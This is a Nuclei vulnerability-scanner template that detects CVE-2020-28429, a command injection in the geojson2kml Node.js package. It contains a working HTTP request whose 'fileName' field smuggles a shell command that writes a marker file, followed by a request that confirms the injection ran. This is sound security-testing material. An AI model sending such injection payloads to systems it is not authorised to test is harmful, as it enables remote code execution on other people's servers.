nuclei-templates/http/cves/2020/CVE-2020-28429.yaml

id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.    
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation    
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.    
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.01897
    epss-percentile: 0.8876
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }        

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5f3443f57ce4a21a84b28f2d09ba7fbe29f0383c89fb75f2b73e9a44dc1178e02204406e9738eacd9e9e354c6fc11dc4df96cd2a23c9eaa4c359d8d2b5b2cba1c7f:922c64590222798bb761d5b6d8e72950